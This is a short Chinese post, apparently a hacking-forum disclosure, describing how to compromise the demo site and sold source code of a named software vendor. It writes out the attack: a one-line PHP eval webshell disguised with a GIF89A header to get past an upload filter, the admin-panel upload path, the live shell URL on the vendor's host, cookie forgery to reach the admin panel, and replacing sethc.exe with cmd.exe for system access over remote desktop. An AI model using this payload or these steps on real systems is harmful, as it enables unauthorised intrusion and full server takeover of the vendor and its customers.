官网：http://www.taodisoft.com/

1、演示站后台竟然有一个地方可上传图片，没有禁止上传。
2、上传图片简单过滤，很容易突破，上传php文件，并能执行。
3、服务器(vps)配置严重低级，拿到webshell之后直接是系统权限，windows系统，替换sethc.exe，直接远程桌面连接即可。
4、其所销售的源代码同样存在此上传漏洞。
5、其所销售的源代码还存在伪造cookie直接进入后台漏洞。所以其所销售的源代码网站后台路径不改，可直接修改cookie进入后台，插入一句话木马或者直接上传可执行文件，拿到webshell。

上传地址是：后台-首页配置-分类产品-下面图片上传

直接构造shell.php文件代码

GIF89A

<?php @eval($_POST['pass']);?>

上传即可得到shell,地址是:http://pro.taodisoft.com/img/index/shell.php

拿到webshell之后就是系统权限了。。。。。。。

把sethc.exe替换成cmd.exe

BY：路人甲